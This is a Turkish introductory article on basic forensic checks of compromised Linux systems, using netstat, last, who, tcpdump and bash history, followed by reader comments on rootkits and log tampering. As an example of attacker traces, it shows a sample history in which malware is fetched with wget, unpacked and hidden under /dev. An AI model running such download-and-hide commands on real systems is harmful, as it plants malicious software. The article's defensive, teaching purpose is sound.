Hazırlanan teknik yazının amacı *NIX sistemleri özelinde adli bilişim konusundaki Türkçe çalışmaların eksikliğini bir ölçüde  de olsa kapatmaktır.

Bu yazı  *NIX sistemlerinde uygulanabilecek ve sadece temel  adli (forensik) analiz tekniklerini kapsayacaktır. Kullanılan yazılımlar oldukça genel tutulmaya çalışılmıştır. Sizin karşı karşıya bulunduğunuz durumlar için daha uygun bir yazılım var ise ona yönelmeniz daha doğru olacaktır.

Bu teknik yazı ve ardından yayınlanması planlanan yazılar sonunda anlatılan tekniklerle:

• Ele geçirilmiş sistemleri inceleyebilir,

• Sistemin nasıl ele geçirildiğini öğrenebilir,

• İleri düzeyde inceleme için gerekli temel bilgilere sahip olabilirsiniz.

Önemli Uyarı: Herhangi bir adım atmadan önce önemli bir karar verilmelidir. Eğer var olan saldırıya kolluk kuvvetlerini dahil edilecek ve saldırgan hakkında soruşturma başlatılacaksa kesinlikle sistemi olduğu şekilde bırakmak ve hiç bir şekilde sistem üzerinde bir değişiklik yapmamak gerekmektedir.

Saldırı sonrası yapılacak herhangi bir değişiklik, var olan delilleri değiştirebilir ya da tümüyle ortadan kaldırabilir. Bu nedenle şirketlerin bu türlü durumlar için "saldırıya uğramış sistemlere dokunmama ve asla fişini çekme" kuralını uygulamasında yarar vardır. Bu şekilde kolluk kuvvetleri varıncaya kadar deliller korunmuş olur.

Bilişim Suçları ve Sistemleri Şube Müdürlüğüne bağlı görevli memurlar, büyük olasılıkla komple bir şekilde saldırıya uğramış sistemi veya en azından sürücülerini içindeki bilgileri güvenli bir biçimde saklamak için isteyeceklerdir. Bu noktadan itibaren sizin adli bilişim analiziniz bitmiş bulunmaktadir.

Eğer saldırıyı kendi bünyenizde araştıracaksanız bu makalede ve sonrasında yayınlanacak makalelerde sunulan örneklerden faydalanılabilir. 

Motivasyon

Kimse mükemmel değildir. Herkes hata yapabilir. Ancak, aynı hataya iki kez düşmekten mümkün olduğunca kaçınılmalıdır.

Bu makalede sunulan örnekler için bir Linux dağıtımı olan Ubuntu 8.10 kullanılmıştır. Daha önce yayınlanan "Fail2ban ile Linux Sistemlerini Koruma " makalesinde  belirtildiği üzere bu teknikler pek az bir farkla tüm Linux sistemleri için geçerli olacaktır. Yazılarda yer alan komutlardan bazıları sadece root kullanıcısının çalıştırabileceği komutlardır. Bu nedenle root olarak sisteme giriş yapılması veya sudo ile komutların çalıştırılması gerekmektedir.

Ağ Bağlantılarının Kontrol Edilmesi

Ağ bağlantıları ve açık portlar netstat komutu ile kontrol edilir.

Kullanım

# netstat -an 

Bu komut yardımıyla herhangi bir arka kapı "backdoor" var ise görülebilir.

tcp 0 0 0.0.0.0:6697 0.0.0.0:* LISTEN 

tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 

tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN 

Yukarıdaki çıktıya göre IRC için kullanılan 6697 portu açık görünmekte. Bu iyiye  işaret olmayabilir.  tcpdump yardımı ile bu porttaki bağlantı dinlenebilir. (tcpdump ile ilgili bir teknik yazıyı ilerleyen günlerde yayınlanacaktır.)

# tcpdump port 6697

 Bu noktada saldırganların "hacker" iletişimi büyük ihtimalle görülebilir ve sistemin nasıl ele geçirildiği hakkında bilgi sahibi olunabilir.

Son Giriş Yapan IP'leri Kontrol Edilmesi

Brute-force attack  oldukça popüler bir saldırı şeklidir. Saldırıyı gerçekleştiren kişiler last komutu yardımıyla saptanabilir.

last  komutu  kullanıcının  giriş ve çıkış zamanlarının belirlenmesinden,  bilgisayar-adı (hostname) ve IP adresi bilgilerinin elde edilmesinde kullanılabilir.

# last -25

Yukarıdaki komut, sistemde oturum açan son 25 kullanıcı hakkında bilgi verir.

 /var/log/auth_log  dosyası da  başarılı veya başarısız oturum açma girişimleri ile ilgili bilgiler içermektedir.

Son Çalıştırılan Komutları Öğrenme

Hiç bir suç mükemmel değildir. Bu adli bilişim için çok doğru bir saptamadır. Çok az sayıda saldırgan parmak izini bırakmadan dijital suç işleyebilir. 

Örneğin, birçok saldırgan .bash_history dosyasında önemli ip uçları bırakarak sistemi terkeder. .bash_history dosyası kullanıcıların çalıştırdığı son komutları içerir.

bash_history dosyası bize saldırganların neler yaptıkları, hangi programları yükledikleri, indirdikleri dosyaları nerelerden aldıkları hakkında bir çok bilgi verebilir. Saldırıya uğramış bir Linux makinesi aşağıdaki tarzda kayıtlar içerebilir.

wget http://malware.tar.gz 

gunzip malware.tar.gz 

tar xf malware.tar 

cd hpd 

cd .. 

rm malware.tar 

cd /dev/.hpd 

Yukarıda görülen komutlar bize kötü amaçlı yazılımın nereden alındığı, nasıl çalıştırıldığı ve nereye yüklendiği hakkında bir fikir vermektedir. Bu bilgiler elde edildikten sonra, yapılması gereken ilk iş saldırganın klasörlerine detaylı bir şekilde göz atmak olmalıdır.

.bash_history dosyasının bilgileri ne biçimde tuttuğu konusunda dikkatli olunmalıdır. .bash_history  dosyası sadece kullanıcı oturumu kapattıktan sonra onun çalıştırdığı tüm komutları gösterir.

Eğer saldırganın hala açık bulunan bir oturumu varsa ve onun .bash_history dosyası inceleniyorsa, boş bir dosya görülebilir.

Bu gibi durumlarda açık olan oturumları görebilmek için who komutunu kullanılabilir.

# who 

user1 pts/0 Nov 18 23:33 (1.2.3.4)

user2 pts/1 Nov 16 10:22 (5.6.7.8) 

Bu sistemde user1 ve user2 olmak üzere iki aktif kullanıcı görünmektedir. Eğer user2 hesabı ele geçirilmiş bir hesap ise, tcpdump ile bu kullanıcının etkinliği izlenebilir.

# tcpdump host 5.6.7.8 -w demo.dump 

Bu komut ile kullanıcının oturumu açtığı IP olan 5.6.7.8' i izlenerek demo.dump dosyasına tüm trafiği yazılmaktadır. Daha sonra tcpdump komutunun -r parametresi ile bu dosya okunabilir.

history komutuda oturumu açtığınız kullanıcının son çalıştırılmış komutlarını listeler. 

.bash_history Dosyasının Etkin Kullanımı

history komutu ve .bash_history dosyasından daha etkin bilgi alabilmek icin /etc/profile dosyasında bazı düzenlemeler yapılabilir.

/etc/profile dosyası uygun bir editör ile açılarak sonuna aşağıdaki satır eklenmelidir.

export HISTTIMEFORMAT="%h/%d - %H:%M:%S "

Artık komutların ne zaman çalıştırıldığıda görülebilecektir.

Önceden çallıştırılmış komutların zamanı .bash_history dosyasında olmayacaktır. Bu nedenle  sistem daha ele geçirilmeden bu değişikliğin  yapılması  gerekmektedir.

Sonuç

Bu teknik yazıda ele geçirilmiş (compromised) Unix/Linux sistemleri hakkında ağ bağlantısını kontrol etme, aktif oturumu olan kullanıcıları öğrenme, kullanıcıların son çalıştırdığı komutları görme, IP'lerini ve makine isimlerini öğrenme gibi temel bilgiler  edinilmesi hedeflendi.

Bu bilgilerin hepsi davetsiz misafirleri kontrol etmek ve sistemde var olan açıkları öğrenmek için oldukça kritik öneme sahiptir.

Bir sonraki teknik yazıda dijital saldırıya uğramış Linux sistemlerini incelemek için kullanabilecek temel araçlar hakkında bilgi verilecektir.

	1. 09-03-2010 15:52
	Yorum maksadını aşıp şevk kırdı ise özür dilerim.Tek amacım eksik bilgilendirmeyi engellemek idi.Çünkü eksik bilgi ile bir şeyler yapmayı deneyip geri dönülmez noktaya gelince bilene danışan ve sonrasında "şunlar şunlar hakkında bilginiz yok ise keşke hiç dokunmasaydınız" denilmek zorunda kalınan sistem yöneticileri/sistem yöneticisi olmak isteyen arkadaşlar ile ilgili örnekleri sık yaşıyoruz."Bu bilgiler bazı durumlarda yanıltıcı olabilir bu durumlarla ilgili bilgilendirme bir sonraki yazıda ele alınacaktır" ibaresinin yazıda olması ya da en azından yorumlarla bu ibarenin eklenmiş olması yeterli bir durumdur.Çalışmalarınız için tebrik eder başarılar dilerim ve Türkçe içerik oluşturma konusundaki çabalarınız için ise ayriyeten çok teşekkürler. Bildir

Suat Alper Seyhan

	2. 04-03-2010 17:45
	Gokhan Bey ve diger arkadaslara yorumlari icin tesekkur ederim. Oncelikle sunu makalede defalarca belirttigim gibi burada tekrar belirtmek istiyorum:  "Bu yazı *NIX sistemlerinde uygulanabilecek ve sadece temel adli (forensik) analiz tekniklerini kapsayacaktır. Kullanılan yazılımlar oldukça genel tutulmaya çalışılmıştır. Sizin karşı karşıya bulunduğunuz durumlar için daha uygun bir yazılım var ise ona yönelmeniz daha doğru olacaktır.    Bu teknik yazı ve ardından yayınlanması planlanan yazılar sonunda anlatılan tekniklerle:    *    Ele geçirilmiş sistemleri inceleyebilir,  *    Sistemin nasıl ele geçirildiğini öğrenebilir,  *    İleri düzeyde inceleme için gerekli temel bilgilere sahip olabilirsiniz."    Burada bu serideki yazilarin amacinin gayet acik olarak belirtildigini yani dusunulenin aksine ileri duzey analiz acisindan sadece "temel" duzeyde konunun ele alinacagidir.     Ancak gerek burada belirtilen yorumlar, gerekse direk sahsi emailim adresime gelen maillerden anlasildigi kadariyla adli analizdeki bilgi boslugu (yanlis anlasilmasin, burada kastedilen Turkce dokumanlarin eksikligidir bir sahis veya kurumlardaki bilgi boslugu degildir)bu tarz makalelerle kapatilmaya baslanacaktir.    Biraz orta seviyeye ya da ileri seviyeye yonelik makaleleri ancak temel bilgi sunan makalelerden sonra ele almanin dogru oldugunu dusunuyorum. O nedenle onlari ileri zamanda burada paylasmayi planliyorum.    Simdi sistemin saldirgan gozuyle bakilmasi yada saldirganin sistemde hic iz birakmadigi konusuna gelince.    Inanin benim calistigim guvenlik sorunlarinin yuzde 95 ine yakininda .bash_history dosyasinin hic silinmeden birakildigini gordum. Kullaniciya ulasan hacking tool'larin kullanimi icin gereken bilgi seviyesi seneler icinde dusmus ve saldirganlarin buyuk bir cogunlugu kullandiklari yazilimlarin nasil calistigini bilmeyen sizin de tabir ettiginiz gibi script kiddie ler olmustur. Sirf bu makale ile bile tum saldirilarin yuzde yirmisi hakkinda genel bir izlenim edinebilirsiniz.    Saldirganlar arasindaki genel tutum, eger saldiri cok onemli bir startejik hedefe degilse bunu gerceklestirenlerin saldirilarin cokluguyla ilgilendigi gercegidir. Cok saldiriyla ilgilenenler de genellikle temel noktalar da bile acikliklar verdiklerini bizzat biliyorum.    Olaya hacker gozuyle bakmak yada "ethical hacker" olmak onemli bir durum. Nacizane ben de o konuda belki de tek yada bir kac sertifikadan biri olan Certified Ethical Hacker sertifikasina sahibim. Tabi sertifikalar cok da onemli degil benim gozumde, o da isin baska boyutu.    Anlatmak istedigim saldirgan gozuyle sisteme tanima yani penetrasyon testleri ayri bir durumdur, saldiridan sonra sistemin nasil, neden ele gecirildigini ogrenme yani adli analiz ayri bir durumdur    Baris Bey'in de belirttigi gibi bir makaleye bagli kalarak genel yorumlarin yapilmasini ben de dogru bulmuyorum.    Adli analiz konusunda gelecek makalede ilk makaledeki ustunden gectigimiz noktalarin nasil da yaniltici olabilecegi ve bu sorunu nasil cozebilecegimizi belirtmeye calisacagim.    Makaleye katkida bulunmak ya da dusuncelerini paylasmak isteyenler Bu mail adresi spam botlara karşı korumalıdır, görebilmek için Javascript açık olmalıdır adresinden benimle irtibata gecebilirler.    Tesekkurler Bildir

İsmail Güneydaş

	3. 04-03-2010 16:42
	Merhaba, öncelikle makalenizi eklediğiniz için size Teşekkür Ederim.. Ancak, Bir sistemde saldırı olmuşsa bu saldırı hakkındaki bilmek istediklerinizin öğrenmenin ilk yolu, bir sisteme nasıl saldırılacağını, klasik , sabitleşmiş fikirler ve makalelerden çok , Saldırgan olmanız gerekmektedir. Kısaca bir sisteme saldırmadan o sistemde güvenlik önlemini sadece kalıplaşmış yöntemlere göre alırsınız.. Sorun şurada kaynaklanıyor, Makale güzel bilgi veriyor ancak, uyguladığınızda alacağınız sonuçtan şüpheliyim, Saldırgan script kiddie değilde, ciddi anlamda bir hacker sa emin olun o sistemde iz bırakmaz. Farklı mac numarası, log kayıtları silinmiş ya da değiştirilmiş bir sistemden yola çıkarsak, muhtemelen saldırgan o sistemde root olmuştur.. Ve sadece bir ip numarasıyla onu bulamazsınız... Anlatmak istediğim gibi birinin yakalanmasını istiyorsanız öncelikle hacker olmalısınız.. Aksi taktirde, araştırmalar boşa zaman kaybıdır.. Saygılar. Bildir

Gökhan Geyik

	4. 26-02-2010 18:53
	öncelikle ismail Bey'e yazdigi adli bilisim yazısı için teşekkür ederim. Adli bilişim alanı ulkemizde yeni yeni gelişmekte olan ve Türkce yazılmış fazla kitap ya da makalenin bulunmadiği bir alan. Bu konuda ismail Bey gibi bilgili sahibi sahısların Turkce yazılar yazması onemli bir durumdur. Tekrar teşekkürler.    Bu arada Suat Bey'in yorumuna katılmadıgımı belirtmek isterim. Editör arkadaşımızın ve yazarın belirttigi gibi adli analiz konusunu tum teorisi ile birlikte bir ya da bir kac yazıda ele alınmasını istemek cok da mantıklı değildir. Bu yazıya adli analize giriş seklinde bakmak çok daha dogru olacaktir diye düşünüyorum. Ayrıca daha serinin ilk yazısından sonra seri daha bitmeden icerik hakkında çok genel eleştiriler yapmak, şevk kırıcı sözler söylemenin çok da doğru olmadığını düşünüyorum.    Saygılarımla Bildir

Baris Kaygun

	5. 26-02-2010 15:07
	Öncelikle yorumlarınız için teşekkürler. Yorumunuzda bahsettiğiniz gibi Adli Analiz, oldukça kapsamlı ve bir teknik yazıda ele alınamayacak kadar geniş bir konudur. Yazar da ilk cümlesinde konuyu belirli bir ölçüde ele alacağını belirtmektedir. Ek olarak teknik yazının şimdilik 1. bölümü yayınlanmıştır. Yazarın önümüzdeki günlerde bu yazının devamını Bilgi Güvenliği Kapısı'na göndereceği tahmin edilmektedir.    Bir yanlış anlamayı düzeltmek adına şu noktayı vurgulamak istiyorum. Sitemizde yer alan kaynaklarda her seviyede bilgi mevcuttur. Özellikle kapsayıcı ve konunun her yönüyle ele alındığı dokümanlarımız kılavuz doküman olarak TUBİTAK-UEKAE personeli tarafından hazırlanmaktadır. Teknik yazılarımız ise farklı seviyelerde olup Kapı'ya katkıda bulunmak isteyen tüm kullanıcılarımıza açıktır. Portalde yayınlanan teknik yazılarımızda yanlış olmamakla birlikte her seviyede katkıya yer veriyoruz. Bu sebeple okumuş olduğunuz yazıyı yayınlanmak üzere kabul ettik. Yorumlarınız ile bu yazıyı geliştirebilir ya da aynı konuyu ele alan daha kapsamlı bir yazıyı hazırlayıp sitemize gönderebilirsiniz. Aksi yaklaşımlar ise siteye katkısı olan istekli insanları rencide etmek olur ki bu bizim tasvip edebileceğimiz bir yaklaşım tarzı değildir.    Bilgi Güvenliği Kapısı'nın kurulumundan bu yana devam eden bir editörlük süreci mevcuttur. Bu süreç çerçevesinde reddedilen yazılar da vardır. Süreç işletilirken çok keskin çizgiler belirlemedik. Yani çok acımasız davranmıyoruz. Kapı'ya gönderilen yazılar bir katma değer sağlıyorsa bizce değerlidir ve yayınlanmaya değerdir. Bu yazı da editör kontrolünden geçmiş ve bu sınıfta değerlendirilmiştir.    İyi günler dileriz. Bildir

Sistem Yöneticisi

	6. 25-02-2010 15:10
	Yukarıda Tübitak kurumumuzun bilgi güvenliği adına yazdığı makalede, eksik bilgilerin nelere yol açacağını bizlere aktaran Suat Alper Seyhana müteşekkirim. Bildir

Cengiz KAYA

	7. 24-02-2010 23:12
	*NIX tabanlı bir sistemde forensik bir inceleme söz konusu ise yazıda anlatılan metodlar uygulanmadan önce bu metodlarla elde edilebilecek bilgilerin doğru olup olmadığının teyidi şarttır.Aksi halde bu yazıda bahsedilen metodlar yanıltıcı bilgiler vererek ele geçirilmiş bir sistemde herşey yolundaymış havası yaratabilir.Çünkü eğer sistemin root yetkisi ele geçirilmiş ise çoğu durumda bir "rootkit" kurulmuştur ve yazıda kullanılan "netstat" "who" ,"tcpdump" hatta yazıda değinilmeyen "ps" vs gibi komutları ihtiva eden dosyaların yerlerine sadece saldırganın istediği-izin verdiği verileri görmenizi sağlayan dosyalar yerleştirilmiştir.Hatta bazı durumlarda kernele modül olarak eklenen rootkitlerle tüm sistem size bu dosyalar vs değiştirilmeksizin sadece saldırganın izin verdiği şeyleri gösterir durumda olabilir.Ayrıca 1980 lerden beri yapılan saldırılarda genel eğilim saldırganların sistemden her çıkış yapışlarında "utmp,wtmp,lastlog,bash_history" vs gibi kayıtları temizlemesi (silmesi değil kendi girişi ile ilgili bilgileri bu dosyalardan çıkarması) şeklindedir.Bu yazılan yazının forensik inceleme konusunda bir anlam ifade etmesi ya da en azından insanları eksik bilgilendirerek "kaş yapayım derken göz çıkarmaması" açısından bu tip bilgilerin toplanmaya başlanmasından önce sistemde rootkitlerin ya da herhangi bir türde log temizleyici yazılımların bulunmadığından emin olunması gerekliliği bilinmelidir.Bu kısa yorumda "teknik yazıya" yaptığım eklemeler ile bile "forensik inceleme" yapabilmek icin gereken bilgi birikiminin on milyonda biri bile aktarılmamıştır.Forensik inceleme hakkında "basit fikir verici" ya da "bir ucundan başlamak için" yazı yazılarak insanların yanlış yönlendirilmesini kaldırabilecek bir uzmanlık dalı değildir.Kalp ameliyatı yapmak için neşter kullanılır denilip "önce neşter sterilize edilmelidir" bilgisini insanlardan esirgemek her ne kadar iyi niyetle yapılsa bile kötü sonuçlar doğurabilir.Devletimizin bilgi güvenliği konusundaki birikimine ve hassasiyetine gölge düşürebilecek ve devletimizin bu konudaki imajını konuda bilgi sahibi kişiler gözünde olumsuz etkileyebilecek durumların oluşmaması açısından sitede yayınlanan teknik yazılar devletin resmi bilgi güvenliği portalında yayınlanmadan önce bir tür editörel süreçten geçmelidir.Saygılarımla Arz Ederim. Bildir

Suat Alper Seyhan

Sadece kayıtlı kullanıcılar yorum yazabilir.
Lütfen sisteme giriş yapın veya kayıt olun.